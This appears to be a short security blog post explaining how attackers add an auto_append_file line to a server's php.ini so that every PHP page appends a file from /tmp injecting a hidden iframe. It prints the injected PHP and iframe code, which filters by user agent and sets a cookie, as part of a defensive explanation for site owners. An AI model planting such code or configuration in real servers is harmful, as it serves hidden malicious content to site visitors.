The Latest in IT Security

Malware Being Called From Your php.ini File


Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src=”″></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = “0ff”

This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.

This is the code of the 0ff file:

if([email protected]($_COOKIE[‘PHPSESS1D’]) &&
 [email protected]_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
 echo ‘<script type=”text/javascript”>
 d=new Date();
 document.cookie=”PHPSESS1D=1; path=/; expires=” + d.toGMTString();
 echo ‘<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src=”″></iframe>’;


So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.

Leave a reply



Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments